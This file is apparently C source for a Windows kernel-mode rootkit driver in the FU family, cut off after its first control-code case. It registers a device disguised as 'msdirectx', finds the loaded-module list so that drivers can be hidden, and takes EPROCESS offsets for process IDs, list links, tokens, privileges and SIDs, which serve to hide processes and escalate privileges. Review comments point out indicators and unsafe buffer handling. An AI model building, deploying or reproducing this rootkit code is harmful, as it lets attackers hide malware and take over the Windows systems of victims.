#include "ntddk.h"
#include "stdio.h"
#include "stdlib.h"
#include "KHide.h"
#include "ProcessName.h"
#include "ioctlcmd.h"
/* Symbolic-link name published for user mode; DriverEntry creates it and
 * HKideUnload removes it.  NOTE(review): the "msdirectx" name is the
 * device-name indicator to look for when triaging this driver. */
const WCHAR deviceLinkBuffer[] = L"\\DosDevices\\msdirectx";
/* Object-manager name the control device is created under (IoCreateDevice). */
const WCHAR deviceNameBuffer[] = L"\\Device\\msdirectx";
/* All logging in this file goes to the kernel debugger through this alias. */
#define DebugPrint DbgPrint
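/*
 * DriverEntry - driver initialisation entry point.
 *
 * Creates the control device named by deviceNameBuffer, publishes it through
 * the deviceLinkBuffer symbolic link, installs HKideDispatch for CREATE, CLOSE,
 * SHUTDOWN and DEVICE_CONTROL, installs HKideUnload, and resolves the two
 * globals the IOCTL handler depends on (gul_ProcessNameOffset and gModuleEntry).
 *
 * DriverObject - driver object supplied by the I/O manager.
 * RegistryPath - service registry key; not used by this driver.
 *
 * Returns STATUS_SUCCESS, the failing IoCreateDevice/IoCreateSymbolicLink
 * status, or STATUS_UNSUCCESSFUL when either global cannot be resolved.
 * Every failure path tears down what was created before it (single goto
 * cleanup chain), so a failed load leaves no device or link behind.
 *
 * NOTE(review): the device is created without a security descriptor, so any
 * local caller that can open the symbolic link can reach the IOCTLs handled in
 * HKideDeviceControl, including the caller-supplied EPROCESS offsets consumed
 * by IOCTL_ROOTKIT_INIT.  Also, HKideUnload is declared to return NTSTATUS
 * while DriverUnload expects a VOID routine; the assignment below compiles
 * only through an incompatible-pointer conversion.
 */
NTSTATUS DriverEntry(
IN PDRIVER_OBJECT DriverObject,
IN PUNICODE_STRING RegistryPath
)
{
    NTSTATUS ntStatus;
    UNICODE_STRING deviceNameUnicodeString;
    UNICODE_STRING deviceLinkUnicodeString;

    (void)RegistryPath;

    /* Device name and the user-visible symbolic link. */
    RtlInitUnicodeString(&deviceNameUnicodeString, deviceNameBuffer);
    RtlInitUnicodeString(&deviceLinkUnicodeString, deviceLinkBuffer);

    ntStatus = IoCreateDevice(DriverObject,
                              0,                /* no device extension */
                              &deviceNameUnicodeString,
                              FILE_DEVICE_ROOTKIT,
                              0,
                              TRUE,             /* Exclusive */
                              &g_HKideDevice);
    if (!NT_SUCCESS(ntStatus)) {
        DebugPrint("Failed to create device!\n");
        return ntStatus;
    }

    ntStatus = IoCreateSymbolicLink(&deviceLinkUnicodeString,
                                    &deviceNameUnicodeString);
    if (!NT_SUCCESS(ntStatus)) {
        DebugPrint("Failed to create symbolic link!\n");
        goto fail_device;
    }

    /* One dispatcher answers every major function this driver handles.
     * (No IoRegisterShutdownNotification is issued here, so the SHUTDOWN
     * slot is only reached if registration happens elsewhere.) */
    DriverObject->MajorFunction[IRP_MJ_SHUTDOWN] =
    DriverObject->MajorFunction[IRP_MJ_CREATE] =
    DriverObject->MajorFunction[IRP_MJ_CLOSE] =
    DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = HKideDispatch;

    /* Its extremely unsafe to unload a system-call hooker.
     * Use GREAT caution. */
    DriverObject->DriverUnload = HKideUnload;

    /* Offset of the process name inside EPROCESS, located from the
     * current process; zero means the lookup failed. */
    gul_ProcessNameOffset = GetLocationOfProcessName(PsGetCurrentProcess());
    if (!gul_ProcessNameOffset) {
        ntStatus = STATUS_UNSUCCESSFUL;
        goto fail_link;
    }

    /* dengxin */
    gModuleEntry = (PMODULE_ENTRY) FindPsLoadedModuleList(DriverObject);
    if (!gModuleEntry) {
        DebugPrint("Failed to create gul_PsLoadedModuleList link!\n");
        ntStatus = STATUS_UNSUCCESSFUL;
        goto fail_link;
    }

    return STATUS_SUCCESS;

fail_link:
    IoDeleteSymbolicLink(&deviceLinkUnicodeString);
fail_device:
    /* Delete the device object; same object as g_HKideDevice. */
    IoDeleteDevice(DriverObject->DeviceObject);
    return ntStatus;
}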
/*
 * HKideUnload - unload routine installed by DriverEntry.
 *
 * When the driver still owns a device object, removes the deviceLinkBuffer
 * symbolic link and deletes the device.  No other state is restored here
 * (DriverEntry's own comment warns that unloading a system-call hooker is
 * unsafe).
 *
 * DriverObject - the driver being unloaded.
 *
 * Returns STATUS_SUCCESS in every case.
 * NOTE(review): DriverUnload is a VOID routine, so this return value is never
 * consumed by the I/O manager.
 */
NTSTATUS HKideUnload(IN PDRIVER_OBJECT DriverObject)
{
    UNICODE_STRING linkName;

    /* Nothing was created, nothing to tear down. */
    if (DriverObject->DeviceObject == NULL) {
        return STATUS_SUCCESS;
    }

    /* Drop the user-visible link first, then the device itself. */
    RtlInitUnicodeString(&linkName, deviceLinkBuffer);
    IoDeleteSymbolicLink(&linkName);
    IoDeleteDevice(DriverObject->DeviceObject);

    return STATUS_SUCCESS;
}
/*
 * HKideDispatch - single dispatch routine for CREATE, CLOSE, SHUTDOWN and
 * DEVICE_CONTROL requests on the control device.
 *
 * CREATE, CLOSE and SHUTDOWN are completed immediately with STATUS_SUCCESS
 * and zero bytes.  DEVICE_CONTROL hands the buffers, lengths and control code
 * to HKideDeviceControl, which writes Irp->IoStatus itself; its return value
 * becomes the completion status.
 *
 * DeviceObject - the control device the request arrived on.
 * Irp          - the request; always completed here with IO_NO_INCREMENT.
 *
 * Returns the status the IRP was completed with.
 *
 * NOTE(review): input and output both default to AssociatedIrp.SystemBuffer,
 * which carries caller data only for METHOD_BUFFERED codes.  For
 * METHOD_NEITHER the output pointer is taken directly from Irp->UserBuffer, a
 * raw user-mode address that is neither probed nor captured in this routine,
 * while the input pointer stays on SystemBuffer instead of
 * Parameters.DeviceIoControl.Type3InputBuffer.  Which transfer methods the
 * codes in ioctlcmd.h actually use is not visible from this file.
 */
NTSTATUS
HKideDispatch(
IN PDEVICE_OBJECT DeviceObject,
IN PIRP Irp
)
{
    PIO_STACK_LOCATION stack = IoGetCurrentIrpStackLocation(Irp);
    PVOID inBuf = Irp->AssociatedIrp.SystemBuffer;
    PVOID outBuf = Irp->AssociatedIrp.SystemBuffer;
    ULONG inLen = stack->Parameters.DeviceIoControl.InputBufferLength;
    ULONG outLen = stack->Parameters.DeviceIoControl.OutputBufferLength;
    ULONG code = stack->Parameters.DeviceIoControl.IoControlCode;
    NTSTATUS status = STATUS_SUCCESS;

    /* Default outcome: success, no payload. */
    Irp->IoStatus.Status = STATUS_SUCCESS;
    Irp->IoStatus.Information = 0;

    if (stack->MajorFunction == IRP_MJ_DEVICE_CONTROL) {
        if (IOCTL_TRANSFER_TYPE(code) == METHOD_NEITHER) {
            outBuf = Irp->UserBuffer;
        }
        /* Its a request from rootkit */
        status = HKideDeviceControl(stack->FileObject, TRUE,
                                    inBuf, inLen,
                                    outBuf, outLen,
                                    code, &Irp->IoStatus, DeviceObject);
    }
    /* IRP_MJ_CREATE, IRP_MJ_CLOSE and IRP_MJ_SHUTDOWN need no extra work. */

    IoCompleteRequest(Irp, IO_NO_INCREMENT);
    return status;
}
NTSTATUS
HKideDeviceControl(
IN PFILE_OBJECT FileObject,
IN BOOLEAN Wait,
IN PVOID InputBuffer,
IN ULONG InputBufferLength,
OUT PVOID OutputBuffer,
IN ULONG OutputBufferLength,
IN ULONG IoControlCode,
OUT PIO_STATUS_BLOCK IoStatus,
IN PDEVICE_OBJECT DeviceObject
)
{
NTSTATUS ntStatus;
UNICODE_STRING deviceLinkUnicodeString;
MODULE_ENTRY m_current;
PMODULE_ENTRY pm_current;
ANSI_STRING ansi_DriverName;
ANSI_STRING hide_DriverName;
UNICODE_STRING uni_hide_DriverName;
int i_count = 0, i_numLogs = 0, find_PID = 0;
int nluids = 0, i_PrivCount = 0, i_VariableLen = 0;
int i_LuidsUsed = 0, luid_attr_count = 0, i_SidCount = 0;
int i_SidSize = 0, i_spaceNeeded = 0, i_spaceSaved = 0;
int i_spaceUsed = 0, sid_count = 0;
DWORD eproc = 0x00000000;
DWORD start_eproc= 0x00000000;
DWORD token = 0x00000000;
PLIST_ENTRY plist_active_procs = NULL;
PLUID_AND_ATTRIBUTES luids_attr = NULL;
PLUID_AND_ATTRIBUTES luids_attr_orig = NULL;
PSID_AND_ATTRIBUTES sid_ptr_old = NULL;
void *varpart = NULL, *varbegin = NULL, *psid = NULL;
DWORD SizeOfOldSids, SizeOfLastSid, d_SidStart;
IoStatus->Status = STATUS_SUCCESS;
IoStatus->Information = 0;
switch ( IoControlCode )
{
case IOCTL_ROOTKIT_INIT:
if ((InputBufferLength < sizeof(int) * 8) || (InputBuffer == NULL))
{
IoStatus->Status = STATUS_INVALID_BUFFER_SIZE;
break;
}
PIDOFFSET = (int) (*(int *)InputBuffer);
FLINKOFFSET = (int) (*((int *)InputBuffer+1));
AUTHIDOFFSET = (int) (*((int *)InputBuffer+2));
TOKENOFFSET = (int) (*((int *)InputBuffer+3));
PRIVCOUNTOFFSET = (int) (*((int *)InputBuffer+4));
PRIVADDROFFSET = (int) (*((int *)InputBuffer+5));
SIDCOUNTOFFSET = (int) (*((int *)InputBuffer+6));
SIDADDROFFSET = (int) (*((int *)InputBuffer+7));
break;